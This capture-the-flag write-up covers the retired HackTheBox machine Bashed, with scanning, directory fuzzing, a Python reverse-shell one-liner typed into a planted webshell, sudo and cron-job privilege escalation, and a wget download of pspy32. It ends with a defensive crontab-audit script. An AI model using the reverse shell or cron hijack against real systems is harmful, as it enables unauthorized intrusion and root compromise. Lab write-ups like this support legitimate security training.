Bashed is a retired Linux box on HackTheBox. It is mentioned in TJ_Null's list of OSCP-like boxes. Let us begin with scanning.

SCANNING :

nmap <IP>

Let us do a service scan for software version detection with -sV switch of nmap.

nmap -sV <IP>

It reveals port 80 has Apache httpd 2.4.18 running.

ENUMERATION :

Browsing to the IP brings up a page that says a webshell (phpbash) is installed somewhere on the server. Let us fuzz for directories to see where the webshell lives.

wfuzz -c -u http://<IP>/FUZZ -w /usr/share/wordlists/dirb/big.txt --hc 400,403,404

-c : colored output.

-u : the target URL; FUZZ marks where each wordlist entry is inserted.

-w : the wordlist to use.

--hc : hide responses with the listed status codes (here 400, 403 and 404).

The wfuzz scan reveals some directories. The dev directory looks interesting. Let us have a look at it.

The dev directory contains the webshell.

EXPLOITATION :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Type the above into the webshell prompt and hit enter, with a netcat listener waiting on the chosen port.

nc -nlvp <port>

We have a shell now. You can read the user flag.

PRIVILEGE ESCALATION TO SCRIPTMANAGER :

If www-data is allowed to run commands as scriptmanager through sudo, I can simply run bash with sudo as user scriptmanager.

sudo -u scriptmanager bash

We have a shell as scriptmanager now.

PRIVILEGE ESCALATION TO ROOT :

find / -type f -user scriptmanager 2>/dev/null

If my instinct is right, there may be a root cron job running the Python script. To verify it, I am going to use pspy32, a tool that shows commands run by other users, cron jobs, etc. as they execute, without needing root. You can find the binary here.

On the attacking box, start a local Python web server in the directory that contains pspy32.

python3 -m http.server 80

On the remote box, download it with wget.

wget http://<your IP>/pspy32

pspy32 should now be present on the remote box. wget does not preserve the executable bit, so make it executable and then run it.

chmod +x pspy32

./pspy32

Seems I was right. test.py in /scripts is run by a root cron job every minute.

We can reuse the same Python reverse shell we used for the www-data shell, but with a different port number. Save the Python body of the reverse shell (without the python -c wrapper) to /scripts/test.py and set up another netcat listener on that port in a different tab.

We have the root shell now. You can read the root flag.
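The weakness behind this root shell is a root cron job executing a file that a lower-privileged user owns. As an added example that is not part of the writeup, the audit below parses an /etc/crontab-style file and flags every path a root job runs (and its parent directory) that is not root-owned or is group/other writable; the crontab text, the FAKE_FS table and uid 1001 are constructed stand-ins, and audit_crontab accepts a stat function so it can run against the real filesystem or the fake one.

```python
import os

# Constructed sample in /etc/crontab format (five time fields, a user, then the
# command); not copied from the box, only the shape matters.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*  *  * * *  root  python /scripts/test.py
"""

# Constructed stand-in for the filesystem: path -> (owner uid, mode bits).
# /scripts and /scripts/test.py belong to uid 1001 (not root), as on the box.
FAKE_FS = {
    "/etc/cron.hourly": (0, 0o755),
    "/scripts": (1001, 0o755),
    "/scripts/test.py": (1001, 0o644),
}
fake_stat = FAKE_FS.__getitem__  # stat_fn for the constructed filesystem

def real_stat(path):
    st = os.stat(path)
    return st.st_uid, st.st_mode & 0o7777

def weakness(uid, mode):
    # A root cron target is safe only if root owns it and nobody else can write it.
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & 0o022:
        return f"writable by group/other (mode {mode:04o})"
    return ""

def audit_crontab(text, stat_fn=real_stat):
    """Map path -> reason for each path a root cron job runs that a non-root
    user could modify; the file and its parent directory are both checked."""
    findings = {}
    for line in text.splitlines():
        parts = line.split(None, 6)
        if len(parts) < 7 or parts[0][0] == "#" or parts[5] != "root":
            continue  # blank, comment, VAR=value, malformed, or not a root job
        for token in (t.rstrip(";&|") for t in parts[6].split() if t[0] == "/"):
            for path in (token, os.path.dirname(token)):
                try:
                    reason = weakness(*stat_fn(path))
                except (OSError, KeyError):
                    continue  # path does not exist on this host
                if reason:
                    findings[path] = reason
    return findings
```

Running audit_crontab(open("/etc/crontab").read()) on a real host uses real_stat; the same check belongs on /etc/cron.d entries and on the directories in a job's PATH.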

So that was the Bashed box from HackTheBox. Hope you enjoyed it.

Thank You for reading this writeup. See you in the next one. Peace.

Breaking things like a bàKà